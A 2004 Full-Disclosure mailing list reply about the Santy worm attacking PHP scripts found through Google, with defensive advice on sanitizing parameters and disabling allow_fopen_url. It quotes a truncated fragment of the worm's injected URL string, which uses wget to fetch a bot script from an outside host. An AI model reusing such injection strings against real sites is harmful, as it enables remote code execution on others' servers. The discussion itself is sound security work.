[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts
- To: Pekka Savola <pekkas@xxxxxxxxxx>
- Subject: [Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts
- From: Juergen Schmidt <ju@xxxxxxxxx>
- Date: Sun, 26 Dec 2004 15:33:00 +0100 (CET)
On Sat, 25 Dec 2004, Pekka Savola wrote:
> On Sat, 25 Dec 2004, Juergen Schmidt wrote:
> > It uses the brasilian Google site to find all kinds of PHP skripts.
> > It parses their URLs and overwrites variables with strings like:
> >
> > 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> > www.visualcoders.net/spybot.txt;...
>
> And AFAICS, this can be prevented by setting register_globals=off in
> php.ini.
Nope -- this only prevents internal variables from being modified by
attackers. As the variable is being listed in search engines, you want to
set them from external parameters. So you have to sanitize them.
Disabling allow_fopen_url protects you against this attack (not against
spying on local files though).
bye, ju
--
Juergen Schmidt Chefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail ju@xxxxxxxxx
GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html